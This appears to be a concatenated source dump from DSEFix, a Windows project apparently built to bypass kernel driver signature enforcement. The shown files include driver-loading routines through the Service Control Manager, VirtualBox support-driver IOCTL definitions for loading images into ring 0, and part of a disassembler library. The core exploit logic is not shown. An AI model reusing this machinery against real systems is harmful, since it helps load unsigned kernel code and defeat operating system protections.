UNICODE 95 | 96 | #define _strend _strend_w 97 | #define _strcpy _strcpy_w 98 | #define _strcat _strcat_w 99 | #define _strlen _strlen_w 100 | #define _strncpy _strncpy_w 101 | 102 | #define _strcmp _strcmp_w 103 | #define _strncmp _strncmp_w 104 | #define _strcmpi _strcmpi_w 105 | #define _strncmpi _strncmpi_w 106 | #define _strstr _strstr_w 107 | #define _strstri _strstri_w 108 | 109 | #define ultostr ultostr_w 110 | #define ultohex ultohex_w 111 | #define itostr itostr_w 112 | #define i64tostr i64tostr_w 113 | #define u64tostr u64tostr_w 114 | #define u64tohex u64tohex_w 115 | 116 | #define strtoul strtoul_w 117 | #define hextoul hextoul_w 118 | #define strtoi strtoi_w 119 | #define strtoi64 strtoi64_w 120 | #define strtou64 strtou64_w 121 | #define hextou64 hextou64_w 122 | 123 | #else // ANSI 124 | 125 | #define _strend _strend_a 126 | #define _strcpy _strcpy_a 127 | #define _strcat _strcat_a 128 | #define _strlen _strlen_a 129 | #define _strncpy _strncpy_a 130 | #define _strcmp _strcmp_a 131 | 132 | #define _strcmp _strcmp_a 133 | #define _strncmp _strncmp_a 134 | #define _strcmpi _strcmpi_a 135 | #define _strncmpi _strncmpi_a 136 | #define _strstr _strstr_a 137 | #define _strstri _strstri_a 138 | 139 | #define ultostr ultostr_a 140 | #define ultohex ultohex_a 141 | #define itostr itostr_a 142 | #define i64tostr i64tostr_a 143 | #define u64tostr u64tostr_a 144 | #define u64tohex u64tohex_a 145 | 146 | #define strtoul strtoul_a 147 | #define hextoul hextoul_a 148 | #define strtoi strtoi_a 149 | #define strtoi64 strtoi64_a 150 | #define strtou64 strtou64_a 151 | #define hextou64 hextou64_a 152 | 153 | #endif 154 | 155 | #endif /* _MINIRTL_ */ 156 | -------------------------------------------------------------------------------- /Source/DSEFix/dsefix.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {97adc510-d95b-4c0c-9750-ffce6348a106} 18 | 19 | 20 | {e6c451e0-0b17-4c46-a17d-d2586e29bf33} 21 | 22 | 23 | {280b4fcc-4872-4f35-8fbc-01f435063546} 24 | 25 | 26 | {31227f1c-f5c0-45c9-b2e7-691751ecf612} 27 | 28 | 29 | 30 | 31 | Source Files 32 | 33 | 34 | minirtl 35 | 36 | 37 | minirtl 38 | 39 | 40 | minirtl 41 | 42 | 43 | minirtl 44 | 45 | 46 | minirtl 47 | 48 | 49 | minirtl 50 | 51 | 52 | minirtl 53 | 54 | 55 | minirtl 56 | 57 | 58 | minirtl 59 | 60 | 61 | minirtl 62 | 63 | 64 | minirtl 65 | 66 | 67 | minirtl 68 | 69 | 70 | minirtl 71 | 72 | 73 | minirtl 74 | 75 | 76 | minirtl 77 | 78 | 79 | minirtl 80 | 81 | 82 | Source Files 83 | 84 | 85 | Source Files 86 | 87 | 88 | cui 89 | 90 | 91 | hde 92 | 93 | 94 | 95 | 96 | Header Files 97 | 98 | 99 | minirtl 100 | 101 | 102 | minirtl 103 | 104 | 105 | minirtl 106 | 107 | 108 | Header Files 109 | 110 | 111 | Header Files 112 | 113 | 114 | Header Files 115 | 116 | 117 | vboxdrv 118 | 119 | 120 | Header Files 121 | 122 | 123 | cui 124 | 125 | 126 | Header Files 127 | 128 | 129 | hde 130 | 131 | 132 | hde 133 | 134 | 135 | hde 136 | 137 | 138 | 139 | 140 | Resource Files 141 | 142 | 143 | -------------------------------------------------------------------------------- /Source/DSEFix/instdrv.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon 4 | * 5 | * TITLE: INSTDRV.C 6 | * 7 | * DATE: 17 July 2016 8 | * 9 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 10 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 11 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 12 | * PARTICULAR PURPOSE. 13 | * 14 | *******************************************************************************/ 15 | #include "global.h" 16 | 17 | /* 18 | * scmInstallDriver 19 | * 20 | * Purpose: 21 | * 22 | * Create SCM service entry describing kernel driver. 23 | * 24 | */ 25 | BOOL scmInstallDriver( 26 | _In_ SC_HANDLE SchSCManager, 27 | _In_ LPCTSTR DriverName, 28 | _In_opt_ LPCTSTR ServiceExe 29 | ) 30 | { 31 | SC_HANDLE schService; 32 | 33 | schService = CreateService(SchSCManager, // SCManager database 34 | DriverName, // name of service 35 | DriverName, // name to display 36 | SERVICE_ALL_ACCESS, // desired access 37 | SERVICE_KERNEL_DRIVER, // service type 38 | SERVICE_DEMAND_START, // start type 39 | SERVICE_ERROR_NORMAL, // error control type 40 | ServiceExe, // service's binary 41 | NULL, // no load ordering group 42 | NULL, // no tag identifier 43 | NULL, // no dependencies 44 | NULL, // LocalSystem account 45 | NULL // no password 46 | ); 47 | if (schService == NULL) { 48 | return FALSE; 49 | } 50 | 51 | CloseServiceHandle(schService); 52 | return TRUE; 53 | } 54 | 55 | /* 56 | * scmStartDriver 57 | * 58 | * Purpose: 59 | * 60 | * Start service, resulting in SCM drvier load. 61 | * 62 | */ 63 | BOOL scmStartDriver( 64 | _In_ SC_HANDLE SchSCManager, 65 | _In_ LPCTSTR DriverName 66 | ) 67 | { 68 | SC_HANDLE schService; 69 | BOOL ret; 70 | 71 | schService = OpenService(SchSCManager, 72 | DriverName, 73 | SERVICE_ALL_ACCESS 74 | ); 75 | if (schService == NULL) 76 | return FALSE; 77 | 78 | ret = StartService(schService, 0, NULL) 79 | || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; 80 | 81 | CloseServiceHandle(schService); 82 | 83 | return ret; 84 | } 85 | 86 | /* 87 | * scmOpenDevice 88 | * 89 | * Purpose: 90 | * 91 | * Open driver device by symbolic link. 92 | * 93 | */ 94 | BOOL scmOpenDevice( 95 | _In_ LPCTSTR DriverName, 96 | _Inout_opt_ PHANDLE lphDevice 97 | ) 98 | { 99 | TCHAR completeDeviceName[64]; 100 | HANDLE hDevice; 101 | 102 | RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName)); 103 | wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName); 104 | 105 | hDevice = CreateFile(completeDeviceName, 106 | GENERIC_READ | GENERIC_WRITE, 107 | 0, 108 | NULL, 109 | OPEN_EXISTING, 110 | FILE_ATTRIBUTE_NORMAL, 111 | NULL 112 | ); 113 | if (hDevice == INVALID_HANDLE_VALUE) 114 | return FALSE; 115 | 116 | if (lphDevice) { 117 | *lphDevice = hDevice; 118 | } 119 | else { 120 | CloseHandle(hDevice); 121 | } 122 | 123 | return TRUE; 124 | } 125 | 126 | /* 127 | * scmStopDriver 128 | * 129 | * Purpose: 130 | * 131 | * Command SCM to stop service, resulting in driver unload. 132 | * 133 | */ 134 | BOOL scmStopDriver( 135 | _In_ SC_HANDLE SchSCManager, 136 | _In_ LPCTSTR DriverName 137 | ) 138 | { 139 | BOOL ret; 140 | INT iRetryCount; 141 | SC_HANDLE schService; 142 | SERVICE_STATUS serviceStatus; 143 | 144 | ret = FALSE; 145 | schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); 146 | if (schService == NULL) { 147 | return ret; 148 | } 149 | 150 | iRetryCount = 5; 151 | do { 152 | SetLastError(0); 153 | 154 | ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus); 155 | if (ret != FALSE) 156 | break; 157 | 158 | if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING) 159 | break; 160 | 161 | Sleep(1000); 162 | iRetryCount--; 163 | } while (iRetryCount); 164 | 165 | CloseServiceHandle(schService); 166 | 167 | return ret; 168 | } 169 | 170 | /* 171 | * scmRemoveDriver 172 | * 173 | * Purpose: 174 | * 175 | * Remove service entry from SCM database. 176 | * 177 | */ 178 | BOOL scmRemoveDriver( 179 | _In_ SC_HANDLE SchSCManager, 180 | _In_ LPCTSTR DriverName 181 | ) 182 | { 183 | SC_HANDLE schService; 184 | BOOL bResult = FALSE; 185 | 186 | schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); 187 | if (schService) { 188 | bResult = DeleteService(schService); 189 | CloseServiceHandle(schService); 190 | } 191 | return bResult; 192 | } 193 | 194 | /* 195 | * scmUnloadDeviceDriver 196 | * 197 | * Purpose: 198 | * 199 | * Combines scmStopDriver and scmRemoveDriver. 200 | * 201 | */ 202 | BOOL scmUnloadDeviceDriver( 203 | _In_ LPCTSTR Name 204 | ) 205 | { 206 | SC_HANDLE schSCManager; 207 | BOOL bResult = FALSE; 208 | 209 | if (Name == NULL) { 210 | return bResult; 211 | } 212 | 213 | schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); 214 | if (schSCManager) { 215 | scmStopDriver(schSCManager, Name); 216 | bResult = scmRemoveDriver(schSCManager, Name); 217 | CloseServiceHandle(schSCManager); 218 | } 219 | return bResult; 220 | } 221 | 222 | /* 223 | * scmLoadDeviceDriver 224 | * 225 | * Purpose: 226 | * 227 | * Unload if already exists, Create, Load and Open driver instance. 228 | * 229 | */ 230 | BOOL scmLoadDeviceDriver( 231 | _In_ LPCTSTR Name, 232 | _In_opt_ LPCTSTR Path, 233 | _Inout_ PHANDLE lphDevice 234 | ) 235 | { 236 | SC_HANDLE schSCManager; 237 | BOOL bResult = FALSE; 238 | 239 | if (Name == NULL) { 240 | return bResult; 241 | } 242 | 243 | schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); 244 | if (schSCManager) { 245 | scmRemoveDriver(schSCManager, Name); 246 | scmInstallDriver(schSCManager, Name, Path); 247 | scmStartDriver(schSCManager, Name); 248 | bResult = scmOpenDevice(Name, lphDevice); 249 | CloseServiceHandle(schSCManager); 250 | } 251 | return bResult; 252 | } 253 | -------------------------------------------------------------------------------- /Source/DSEFix/dsefix.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | {BF7B9380-9160-4E08-8979-A9A44A3343AA} 15 | Win32Proj 16 | dsefix 17 | 8.1 18 | 19 | 20 | 21 | Application 22 | true 23 | v140 24 | Unicode 25 | 26 | 27 | Application 28 | false 29 | v140 30 | true 31 | Unicode 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | true 47 | .\output\$(Platform)\$(Configuration)\ 48 | .\output\$(Platform)\$(Configuration)\ 49 | 50 | 51 | false 52 | .\output\$(Platform)\$(Configuration)\ 53 | .\output\$(Platform)\$(Configuration)\ 54 | AllRules.ruleset 55 | true 56 | 57 | 58 | 59 | 60 | 61 | Level4 62 | Disabled 63 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 64 | true 65 | $(ProjectDir);%(AdditionalIncludeDirectories) 66 | 67 | 68 | Console 69 | true 70 | DSEFixMain 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | Level4 80 | 81 | 82 | MaxSpeed 83 | true 84 | true 85 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 86 | true 87 | true 88 | true 89 | MultiThreaded 90 | Guard 91 | $(ProjectDir);%(AdditionalIncludeDirectories) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | DSEFixMain 100 | RequireAdministrator 101 | true 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | -------------------------------------------------------------------------------- /Source/DSEFix/vbox.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | typedef void* RTR0PTR; 4 | 5 | typedef struct _SUPREQHDR { 6 | /** Cookie. */ 7 | uint32_t u32Cookie; 8 | /** Session cookie. */ 9 | uint32_t u32SessionCookie; 10 | /** The size of the input. */ 11 | uint32_t cbIn; 12 | /** The size of the output. */ 13 | uint32_t cbOut; 14 | /** Flags. See SUPREQHDR_FLAGS_* for details and values. */ 15 | uint32_t fFlags; 16 | /** The VBox status code of the operation, out direction only. */ 17 | int32_t rc; 18 | } SUPREQHDR; 19 | 20 | /** SUP_IOCTL_COOKIE. */ 21 | typedef struct _SUPCOOKIE { 22 | /** The header. 23 | * u32Cookie must be set to SUPCOOKIE_INITIAL_COOKIE. 24 | * u32SessionCookie should be set to some random value. */ 25 | SUPREQHDR Hdr; 26 | union 27 | { 28 | struct 29 | { 30 | /** Magic word. */ 31 | char szMagic[16]; 32 | /** The requested interface version number. */ 33 | uint32_t u32ReqVersion; 34 | /** The minimum interface version number. */ 35 | uint32_t u32MinVersion; 36 | } In; 37 | struct 38 | { 39 | /** Cookie. */ 40 | uint32_t u32Cookie; 41 | /** Session cookie. */ 42 | uint32_t u32SessionCookie; 43 | /** Interface version for this session. */ 44 | uint32_t u32SessionVersion; 45 | /** The actual interface version in the driver. */ 46 | uint32_t u32DriverVersion; 47 | /** Number of functions available for the SUP_IOCTL_QUERY_FUNCS request. */ 48 | uint32_t cFunctions; 49 | /** Session handle. */ 50 | /*R0PTRTYPE(PSUPDRVSESSION)*/ PVOID pSession; 51 | } Out; 52 | } u; 53 | } SUPCOOKIE, *PSUPCOOKIE; 54 | 55 | typedef struct _SUPLDROPEN { 56 | /** The header. */ 57 | SUPREQHDR Hdr; 58 | union 59 | { 60 | struct 61 | { 62 | /** Size of the image we'll be loading. */ 63 | uint32_t cbImage; 64 | /** Image name. 65 | * This is the NAME of the image, not the file name. It is used 66 | * to share code with other processes. (Max len is 32 chars!) */ 67 | char szName[32]; 68 | } In; 69 | struct 70 | { 71 | /** The base address of the image. */ 72 | RTR0PTR pvImageBase; 73 | /** Indicate whether or not the image requires loading. */ 74 | BOOLEAN fNeedsLoading; 75 | } Out; 76 | } u; 77 | } SUPLDROPEN, *PSUPLDROPEN; 78 | 79 | typedef enum _SUPLDRLOADEP { 80 | SUPLDRLOADEP_NOTHING = 0, 81 | SUPLDRLOADEP_VMMR0, 82 | SUPLDRLOADEP_SERVICE, 83 | SUPLDRLOADEP_32BIT_HACK = 0x7fffffff 84 | } SUPLDRLOADEP; 85 | 86 | typedef struct _SUPSETVMFORFAST { 87 | /** The header. */ 88 | SUPREQHDR Hdr; 89 | union 90 | { 91 | struct 92 | { 93 | /** The ring-0 VM handle (pointer). */ 94 | PVOID pVMR0; 95 | } In; 96 | } u; 97 | } SUPSETVMFORFAST, *PSUPSETVMFORFAST; 98 | 99 | typedef struct _SUPLDRLOAD 100 | { 101 | /** The header. */ 102 | SUPREQHDR Hdr; 103 | union 104 | { 105 | struct 106 | { 107 | /** The address of module initialization function. Similar to _DLL_InitTerm(hmod, 0). */ 108 | PVOID pfnModuleInit; 109 | /** The address of module termination function. Similar to _DLL_InitTerm(hmod, 1). */ 110 | PVOID pfnModuleTerm; 111 | /** Special entry points. */ 112 | union 113 | { 114 | /** SUPLDRLOADEP_VMMR0. */ 115 | struct 116 | { 117 | /** The module handle (i.e. address). */ 118 | RTR0PTR pvVMMR0; 119 | /** Address of VMMR0EntryInt function. */ 120 | RTR0PTR pvVMMR0EntryInt; 121 | /** Address of VMMR0EntryFast function. */ 122 | RTR0PTR pvVMMR0EntryFast; 123 | /** Address of VMMR0EntryEx function. */ 124 | RTR0PTR pvVMMR0EntryEx; 125 | } VMMR0; 126 | /** SUPLDRLOADEP_SERVICE. */ 127 | struct 128 | { 129 | /** The service request handler. 130 | * (PFNR0SERVICEREQHANDLER isn't defined yet.) */ 131 | RTR0PTR pfnServiceReq; 132 | /** Reserved, must be NIL. */ 133 | RTR0PTR apvReserved[3]; 134 | } Service; 135 | } EP; 136 | /** Address. */ 137 | RTR0PTR pvImageBase; 138 | /** Entry point type. */ 139 | SUPLDRLOADEP eEPType; 140 | /** The offset of the symbol table. */ 141 | uint32_t offSymbols; 142 | /** The number of entries in the symbol table. */ 143 | uint32_t cSymbols; 144 | /** The offset of the string table. */ 145 | uint32_t offStrTab; 146 | /** Size of the string table. */ 147 | uint32_t cbStrTab; 148 | /** Size of image (including string and symbol tables). */ 149 | uint32_t cbImage; 150 | /** The image data. */ 151 | char achImage[1]; 152 | } In; 153 | } u; 154 | } SUPLDRLOAD, *PSUPLDRLOAD; 155 | 156 | 157 | #define RT_SIZEOFMEMB(type, member) ( sizeof(((type *)(void *)0)->member) ) 158 | #define SUPCOOKIE_INITIAL_COOKIE 0x69726f74 /* 'tori' */ 159 | #define SUP_IOCTL_COOKIE_SIZE_IN sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.In) 160 | #define SUP_IOCTL_COOKIE_SIZE_OUT sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.Out) 161 | 162 | #define SUP_IOCTL_FLAG 128 163 | 164 | #define SUP_CTL_CODE_SIZE(Function, Size) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS) 165 | #define SUP_CTL_CODE_BIG(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS) 166 | #define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_NEITHER, FILE_WRITE_ACCESS) 167 | #define SUP_CTL_CODE_NO_SIZE(uIOCtl) (uIOCtl) 168 | 169 | /** The magic value. */ 170 | #define SUPREQHDR_FLAGS_MAGIC UINT32_C(0x42000042) 171 | /** The default value. Use this when no special stuff is requested. */ 172 | #define SUPREQHDR_FLAGS_DEFAULT SUPREQHDR_FLAGS_MAGIC 173 | #define VERR_INTERNAL_ERROR (-225) 174 | #define SUPCOOKIE_MAGIC "The Magic Word!" 175 | #define SUPDRV_IOC_VERSION 0x001a0007 176 | /** The request size. */ 177 | #define SUP_IOCTL_COOKIE_SIZE sizeof(SUPCOOKIE) 178 | /** Negotiate cookie. */ 179 | #define SUP_IOCTL_COOKIE SUP_CTL_CODE_SIZE(1, SUP_IOCTL_COOKIE_SIZE) 180 | 181 | /** There is extra input that needs copying on some platforms. */ 182 | #define SUPREQHDR_FLAGS_EXTRA_IN UINT32_C(0x00000100) 183 | /** There is extra output that needs copying on some platforms. */ 184 | #define SUPREQHDR_FLAGS_EXTRA_OUT UINT32_C(0x00000200) 185 | 186 | /** @name SUP_IOCTL_SET_VM_FOR_FAST 187 | * Set the VM handle for doing fast call ioctl calls. 188 | * @{ 189 | */ 190 | #define SUP_IOCTL_SET_VM_FOR_FAST SUP_CTL_CODE_SIZE(19, SUP_IOCTL_SET_VM_FOR_FAST_SIZE) 191 | #define SUP_IOCTL_SET_VM_FOR_FAST_SIZE sizeof(SUPSETVMFORFAST) 192 | #define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN sizeof(SUPSETVMFORFAST) 193 | #define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT sizeof(SUPREQHDR) 194 | #define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66) 195 | 196 | #define SUP_IOCTL_LDR_OPEN SUP_CTL_CODE_SIZE(5, SUP_IOCTL_LDR_OPEN_SIZE) 197 | #define SUP_IOCTL_LDR_OPEN_SIZE sizeof(SUPLDROPEN) 198 | #define SUP_IOCTL_LDR_OPEN_SIZE_IN sizeof(SUPLDROPEN) 199 | #define SUP_IOCTL_LDR_OPEN_SIZE_OUT (sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPLDROPEN, u.Out)) 200 | 201 | #define SUP_IOCTL_LDR_LOAD SUP_CTL_CODE_BIG(6) 202 | #define SUP_IOCTL_LDR_LOAD_SIZE(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage]) 203 | #define SUP_IOCTL_LDR_LOAD_SIZE_IN(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage]) 204 | #define SUP_IOCTL_LDR_LOAD_SIZE_OUT sizeof(SUPREQHDR) 205 | 206 | /** @name SUP_IOCTL_LDR_FREE 207 | * Free an image. 208 | * @{ 209 | */ 210 | #define SUP_IOCTL_LDR_FREE SUP_CTL_CODE_SIZE(7, SUP_IOCTL_LDR_FREE_SIZE) 211 | #define SUP_IOCTL_LDR_FREE_SIZE sizeof(SUPLDRFREE) 212 | #define SUP_IOCTL_LDR_FREE_SIZE_IN sizeof(SUPLDRFREE) 213 | #define SUP_IOCTL_LDR_FREE_SIZE_OUT sizeof(SUPREQHDR) 214 | 215 | typedef struct _SUPLDRFREE { 216 | /** The header. */ 217 | SUPREQHDR Hdr; 218 | union 219 | { 220 | struct 221 | { 222 | /** Address. */ 223 | RTR0PTR pvImageBase; 224 | } In; 225 | } u; 226 | } SUPLDRFREE, *PSUPLDRFREE; 227 | -------------------------------------------------------------------------------- /Source/DSEFix/hde/hde64.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #include "hde64.h" 9 | #include "table64.h" 10 | 11 | #pragma warning(push) 12 | #pragma warning(disable:4701) 13 | #pragma warning(disable:4706) 14 | 15 | unsigned int hde64_disasm(const void *code, hde64s *hs) 16 | { 17 | uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0; 18 | uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0; 19 | uint8_t op64 = 0; 20 | 21 | // Avoid using memset to reduce the footprint. 22 | #ifndef _MSC_VER 23 | memset((LPBYTE)hs, 0, sizeof(hde64s)); 24 | #else 25 | __stosb((LPBYTE)hs, 0, sizeof(hde64s)); 26 | #endif 27 | 28 | for (x = 16; x; x--) 29 | switch (c = *p++) { 30 | case 0xf3: 31 | hs->p_rep = c; 32 | pref |= PRE_F3; 33 | break; 34 | case 0xf2: 35 | hs->p_rep = c; 36 | pref |= PRE_F2; 37 | break; 38 | case 0xf0: 39 | hs->p_lock = c; 40 | pref |= PRE_LOCK; 41 | break; 42 | case 0x26: case 0x2e: case 0x36: 43 | case 0x3e: case 0x64: case 0x65: 44 | hs->p_seg = c; 45 | pref |= PRE_SEG; 46 | break; 47 | case 0x66: 48 | hs->p_66 = c; 49 | pref |= PRE_66; 50 | break; 51 | case 0x67: 52 | hs->p_67 = c; 53 | pref |= PRE_67; 54 | break; 55 | default: 56 | goto pref_done; 57 | } 58 | pref_done: 59 | 60 | hs->flags = (uint32_t)pref << 23; 61 | 62 | if (!pref) 63 | pref |= PRE_NONE; 64 | 65 | if ((c & 0xf0) == 0x40) { 66 | hs->flags |= F_PREFIX_REX; 67 | if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8) 68 | op64++; 69 | hs->rex_r = (c & 7) >> 2; 70 | hs->rex_x = (c & 3) >> 1; 71 | hs->rex_b = c & 1; 72 | if (((c = *p++) & 0xf0) == 0x40) { 73 | opcode = c; 74 | goto error_opcode; 75 | } 76 | } 77 | 78 | if ((hs->opcode = c) == 0x0f) { 79 | hs->opcode2 = c = *p++; 80 | ht += DELTA_OPCODES; 81 | } else if (c >= 0xa0 && c <= 0xa3) { 82 | op64++; 83 | if (pref & PRE_67) 84 | pref |= PRE_66; 85 | else 86 | pref &= ~PRE_66; 87 | } 88 | 89 | opcode = c; 90 | cflags = ht[ht[opcode / 4] + (opcode % 4)]; 91 | 92 | if (cflags == C_ERROR) { 93 | error_opcode: 94 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 95 | cflags = 0; 96 | if ((opcode & -3) == 0x24) 97 | cflags++; 98 | } 99 | 100 | x = 0; 101 | if (cflags & C_GROUP) { 102 | uint16_t t; 103 | t = *(uint16_t *)(ht + (cflags & 0x7f)); 104 | cflags = (uint8_t)t; 105 | x = (uint8_t)(t >> 8); 106 | } 107 | 108 | if (hs->opcode2) { 109 | ht = hde64_table + DELTA_PREFIXES; 110 | if (ht[ht[opcode / 4] + (opcode % 4)] & pref) 111 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 112 | } 113 | 114 | if (cflags & C_MODRM) { 115 | hs->flags |= F_MODRM; 116 | hs->modrm = c = *p++; 117 | hs->modrm_mod = m_mod = c >> 6; 118 | hs->modrm_rm = m_rm = c & 7; 119 | hs->modrm_reg = m_reg = (c & 0x3f) >> 3; 120 | 121 | if (x && ((x << m_reg) & 0x80)) 122 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 123 | 124 | if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) { 125 | uint8_t t = opcode - 0xd9; 126 | if (m_mod == 3) { 127 | ht = hde64_table + DELTA_FPU_MODRM + t*8; 128 | t = ht[m_reg] << m_rm; 129 | } else { 130 | ht = hde64_table + DELTA_FPU_REG; 131 | t = ht[t] << m_reg; 132 | } 133 | if (t & 0x80) 134 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 135 | } 136 | 137 | if (pref & PRE_LOCK) { 138 | if (m_mod == 3) { 139 | hs->flags |= F_ERROR | F_ERROR_LOCK; 140 | } else { 141 | uint8_t *table_end, op = opcode; 142 | if (hs->opcode2) { 143 | ht = hde64_table + DELTA_OP2_LOCK_OK; 144 | table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; 145 | } else { 146 | ht = hde64_table + DELTA_OP_LOCK_OK; 147 | table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; 148 | op &= -2; 149 | } 150 | for (; ht != table_end; ht++) 151 | if (*ht++ == op) { 152 | if (!((*ht << m_reg) & 0x80)) 153 | goto no_lock_error; 154 | else 155 | break; 156 | } 157 | hs->flags |= F_ERROR | F_ERROR_LOCK; 158 | no_lock_error: 159 | ; 160 | } 161 | } 162 | 163 | if (hs->opcode2) { 164 | switch (opcode) { 165 | case 0x20: case 0x22: 166 | m_mod = 3; 167 | if (m_reg > 4 || m_reg == 1) 168 | goto error_operand; 169 | else 170 | goto no_error_operand; 171 | case 0x21: case 0x23: 172 | m_mod = 3; 173 | if (m_reg == 4 || m_reg == 5) 174 | goto error_operand; 175 | else 176 | goto no_error_operand; 177 | } 178 | } else { 179 | switch (opcode) { 180 | case 0x8c: 181 | if (m_reg > 5) 182 | goto error_operand; 183 | else 184 | goto no_error_operand; 185 | case 0x8e: 186 | if (m_reg == 1 || m_reg > 5) 187 | goto error_operand; 188 | else 189 | goto no_error_operand; 190 | } 191 | } 192 | 193 | if (m_mod == 3) { 194 | uint8_t *table_end; 195 | if (hs->opcode2) { 196 | ht = hde64_table + DELTA_OP2_ONLY_MEM; 197 | table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; 198 | } else { 199 | ht = hde64_table + DELTA_OP_ONLY_MEM; 200 | table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; 201 | } 202 | for (; ht != table_end; ht += 2) 203 | if (*ht++ == opcode) { 204 | if (*ht++ & pref && !((*ht << m_reg) & 0x80)) 205 | goto error_operand; 206 | else 207 | break; 208 | } 209 | goto no_error_operand; 210 | } else if (hs->opcode2) { 211 | switch (opcode) { 212 | case 0x50: case 0xd7: case 0xf7: 213 | if (pref & (PRE_NONE | PRE_66)) 214 | goto error_operand; 215 | break; 216 | case 0xd6: 217 | if (pref & (PRE_F2 | PRE_F3)) 218 | goto error_operand; 219 | break; 220 | case 0xc5: 221 | goto error_operand; 222 | } 223 | goto no_error_operand; 224 | } else 225 | goto no_error_operand; 226 | 227 | error_operand: 228 | hs->flags |= F_ERROR | F_ERROR_OPERAND; 229 | no_error_operand: 230 | 231 | c = *p++; 232 | if (m_reg <= 1) { 233 | if (opcode == 0xf6) 234 | cflags |= C_IMM8; 235 | else if (opcode == 0xf7) 236 | cflags |= C_IMM_P66; 237 | } 238 | 239 | switch (m_mod) { 240 | case 0: 241 | if (pref & PRE_67) { 242 | if (m_rm == 6) 243 | disp_size = 2; 244 | } else 245 | if (m_rm == 5) 246 | disp_size = 4; 247 | break; 248 | case 1: 249 | disp_size = 1; 250 | break; 251 | case 2: 252 | disp_size = 2; 253 | if (!(pref & PRE_67)) 254 | disp_size <<= 1; 255 | } 256 | 257 | if (m_mod != 3 && m_rm == 4) { 258 | hs->flags |= F_SIB; 259 | p++; 260 | hs->sib = c; 261 | hs->sib_scale = c >> 6; 262 | hs->sib_index = (c & 0x3f) >> 3; 263 | if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1)) 264 | disp_size = 4; 265 | } 266 | 267 | p--; 268 | switch (disp_size) { 269 | case 1: 270 | hs->flags |= F_DISP8; 271 | hs->disp.disp8 = *p; 272 | break; 273 | case 2: 274 | hs->flags |= F_DISP16; 275 | hs->disp.disp16 = *(uint16_t *)p; 276 | break; 277 | case 4: 278 | hs->flags 